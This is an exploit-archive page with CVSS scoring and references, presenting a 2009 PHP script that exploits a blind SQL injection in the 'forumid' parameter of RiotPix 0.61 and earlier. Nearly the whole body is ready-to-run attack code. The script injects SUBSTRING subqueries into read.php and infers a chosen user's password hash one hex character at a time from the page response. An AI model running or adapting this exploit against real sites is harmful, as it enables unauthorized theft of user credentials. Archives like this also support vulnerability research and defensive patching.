RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit

2009.01.10
Credit: cOndemned
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* $Id: riotpix-0.61.txt,v 0.1 2009/01/06 03:47:30 cOndemned Exp $ RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit Bug found && Exploited by cOndemned Download : http://www.riotpix.com/download/riotpix0_61.zip Description : It's just simple Blind SQL Injection exploit that gets password hash of given user. Code is really simple - without proxy, or error handling, but i don't think it is important, as long as the RiotPix isn't famous script... ------------------------------------------------------------------- Greetz: ZaBeaTy, str0ke, sid.psycho & TWT, wojtus0007, 0in, vCore "...What is left to die for, what is left to give..." */ echo "\n[~] RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit"; echo "\n[~] Bug found && Exploited by cOndemned\n"; if($argc != 4) { printf("[!] Usage: php %s <target_size> <username> <topic_id>\n\n", $argv[0]); exit; } list($sploit, $target, $username, $topicid) = $argv; $charsArr = array(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $pos = 1; echo "[~] Password Hash : "; while($pos != 33) { for($i = 0; $i <= count($charsArr); $i++) { $query = "/read.php?forumid=$topicid+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='$username'),$pos,1)=CHAR({$charsArr[$i]})--"; $source = file_get_contents($target . $query); if(!eregi('existent', $source)) { printf("%s", chr($charsArr[$i])); $pos++; break; } flush(STDOUT); } } echo "\n[~] Done\n\n"; ?>

References:

http://www.securityfocus.com/bid/33129
http://www.milw0rm.com/exploits/7679
http://secunia.com/advisories/33395


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top